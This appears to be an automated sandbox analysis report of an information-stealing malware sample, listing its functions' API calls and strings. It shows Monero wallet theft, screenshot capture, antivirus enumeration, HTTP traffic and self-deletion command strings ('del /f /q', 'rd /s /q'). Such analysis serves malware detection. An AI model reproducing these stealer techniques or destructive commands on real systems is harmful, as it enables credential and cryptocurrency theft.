                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$Openlstrcpy$strtok_s$CreateDirectoryHeapProcessProcess32lstrlen$AllocCloseConnectExitFirstH_prologHandleHttpInformationNextOptionRequestSleepSnapshotToolhelp32VolumeWindowslstrcat
                                                                                                                                                                                      • String ID: .exe$1$8`6$_DEBUG.zip$com$f5$f5$http://$stadia$technologies
                                                                                                                                                                                      • API String ID: 4092323695-586740850
                                                                                                                                                                                      • Opcode ID: 652aad01e30748630ccab5b9ac2bae77168347f3880fe0bd70dcf5d7ccf10900
                                                                                                                                                                                      • Instruction ID: 3e2a3de8f381c5650c2b0b694d98d30fa4c38cea0b14f5c3f787e24a15e0ffff
                                                                                                                                                                                      • Opcode Fuzzy Hash: 652aad01e30748630ccab5b9ac2bae77168347f3880fe0bd70dcf5d7ccf10900
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18921D71D00118ABCB16FBA4CC92DEEB7B8BF25304F4541A6F9066E091EF346B49CB91
                                                                                                                                                                                      Function 0034EC0C Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 161registrystringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0035E266,003613FC,00361ECC), ref: 0034EC4A
                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00361678), ref: 0034EC8E
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0034ECB8
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0034ECD1
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,?,?,?), ref: 0034ECFB
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0034ED10
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,?,?,?,00000000,?,?,00000000,?,003613FC), ref: 0034ED81
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                      • String ID: - $%s\%s$?
                                                                                                                                                                                      • API String ID: 1989970852-3278919252
                                                                                                                                                                                      • Opcode ID: 631c04705611263b5e236ae70d06ef501c6710171948d05e72aa8e6683714552
                                                                                                                                                                                      • Instruction ID: 11af9a1fbed1aa3578ff7c6d33e5853560efd84aefcaa2555cbeaa667be3b20a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 631c04705611263b5e236ae70d06ef501c6710171948d05e72aa8e6683714552
                                                                                                                                                                                      • Instruction Fuzzy Hash: D351EA71800119ABDB12EBD0DD85CEEBBBDFF15345F504166F506BA061EB34AB89CBA0
                                                                                                                                                                                      Function 0034FEF3 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 150COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 0034FF14
                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0034FF3C
                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0034FF4A
                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0034FF57
                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0034FF84
                                                                                                                                                                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 0034FFF5
                                                                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 0034FFFE
                                                                                                                                                                                      • GlobalSize.KERNEL32(?), ref: 00350009
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 003446BD: lstrlenA.KERNEL32(00000000), ref: 0034472B
                                                                                                                                                                                        • Part of subcall function 003446BD: StrCmpCA.SHLWAPI(?,0035E266,0035E266,0035E266,0035E266), ref: 0034477D
                                                                                                                                                                                        • Part of subcall function 003446BD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034479D
                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00350068
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00350083
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0035008C
                                                                                                                                                                                      • CloseWindow.USER32(00000000), ref: 0035009B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectSizelstrlenmemset
                                                                                                                                                                                      • String ID: image/jpeg
                                                                                                                                                                                      • API String ID: 2149350297-3785015651
                                                                                                                                                                                      • Opcode ID: b650668eca8d860c30a9b2470f2ad4acd965bcb7ac73d5492cb1c3e682c3a281
                                                                                                                                                                                      • Instruction ID: a3dc9755a87ad3119d60122da0acc543085f77602f776508529631999e36f680
                                                                                                                                                                                      • Opcode Fuzzy Hash: b650668eca8d860c30a9b2470f2ad4acd965bcb7ac73d5492cb1c3e682c3a281
                                                                                                                                                                                      • Instruction Fuzzy Hash: E651EA72905118BFDB02AFE0EC49DEE7FBDEF45351B004025F906E6160EB319A96DBA1
                                                                                                                                                                                      Function 00341C5E Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 152stringfileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 00341C76
                                                                                                                                                                                        • Part of subcall function 003412A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412B4
                                                                                                                                                                                        • Part of subcall function 003412A0: HeapAlloc.KERNEL32(00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412BB
                                                                                                                                                                                        • Part of subcall function 003412A0: RegOpenKeyExA.KERNEL32(?,?,00000000,00020119,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412D4
                                                                                                                                                                                        • Part of subcall function 003412A0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8), ref: 003412ED
                                                                                                                                                                                        • Part of subcall function 003412A0: RegCloseKey.ADVAPI32(?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412F6
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00341C9A
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00341CA7
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.keys), ref: 00341CC2
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00341DA7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00341E11
                                                                                                                                                                                      • memset.MSVCRT ref: 00341E2F
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeapOpenlstrlenmemset$CopyDeleteHandleLocalObjectProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                                                                                                                                                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$f5$wallet_path
                                                                                                                                                                                      • API String ID: 2375508334-1661993177
                                                                                                                                                                                      • Opcode ID: e36ed64e814139065d5d02c4f052e4770d6519f74b2fca29af11f3642f6efb42
                                                                                                                                                                                      • Instruction ID: ca98922203ab2f3fcaf22d74bd5ed11d2ad639208e550a48fbb79fdad147912b
                                                                                                                                                                                      • Opcode Fuzzy Hash: e36ed64e814139065d5d02c4f052e4770d6519f74b2fca29af11f3642f6efb42
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9551E772900119AADF06FBE0DD96DEE77BCBF14304F400565F506BE0A1EE34AA49CB91
                                                                                                                                                                                      Function 0034F493 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 119comCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _EH_prolog.MSVCRT ref: 0034F498
                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F4AD
                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F4BE
                                                                                                                                                                                      • CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F4D8
                                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F50E
                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0034F55D
                                                                                                                                                                                        • Part of subcall function 0034F7BB: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0034F580,?), ref: 0034F7C3
                                                                                                                                                                                        • Part of subcall function 0034F7BB: CharToOemW.USER32(?,00000000), ref: 0034F7CF
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0034F58E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                      • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                      • API String ID: 3694693100-2561087649
                                                                                                                                                                                      • Opcode ID: 77880c277254990a1bb35ef745aa56b67460514400af34b5622e388cc7fc3c83
                                                                                                                                                                                      • Instruction ID: c0106d8ba451e63e454fbc678baa3e64ab1e318a943386591ee49f7055b309ca
                                                                                                                                                                                      • Opcode Fuzzy Hash: 77880c277254990a1bb35ef745aa56b67460514400af34b5622e388cc7fc3c83
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D314771A01225ABCB15DF95CC49EEFBFBDEF4AB61F148155F505AA290C770AB00CBA0
                                                                                                                                                                                      Function 003518AE Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 113COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 003518C9
                                                                                                                                                                                      • memset.MSVCRT ref: 003518D5
                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 003518EA
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 003519E9
                                                                                                                                                                                      • memset.MSVCRT ref: 003519F6
                                                                                                                                                                                      • memset.MSVCRT ref: 00351A04
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00351A15
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                      • String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                      • API String ID: 1943017432-1686486140
                                                                                                                                                                                      • Opcode ID: a7c51a0355d0f769579ce2c80441a3d4d1ae7066b20023d2e0c153e4c7d880cc
                                                                                                                                                                                      • Instruction ID: f8b746994837a216ed18c992cb1532dab02d6b23bdc051ffdbee2a4e6eff7d8b
                                                                                                                                                                                      • Opcode Fuzzy Hash: a7c51a0355d0f769579ce2c80441a3d4d1ae7066b20023d2e0c153e4c7d880cc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 57410D71C00119ABCB06EBE0DC96DDEB7BCBF25700F414166F506BA091EB74AB49CB94
                                                                                                                                                                                      Function 0034F078 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 113memorystringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00361ECC), ref: 0034F095
                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32(nK5,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0034F0C7
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F10A
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0034F111
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0034F13E
                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,003618B0), ref: 0034F14D
                                                                                                                                                                                        • Part of subcall function 0034EFBA: GetCurrentHwProfileA.ADVAPI32(?), ref: 0034EFCA
                                                                                                                                                                                        • Part of subcall function 0034EFBA: memset.MSVCRT ref: 0034EFF5
                                                                                                                                                                                        • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,00000000), ref: 0034F025
                                                                                                                                                                                        • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,003618AC), ref: 0034F03F
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034F166
                                                                                                                                                                                        • Part of subcall function 0034FC4F: malloc.MSVCRT ref: 0034FC58
                                                                                                                                                                                        • Part of subcall function 0034FC4F: strncpy.MSVCRT ref: 0034FC68
                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0034F190
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
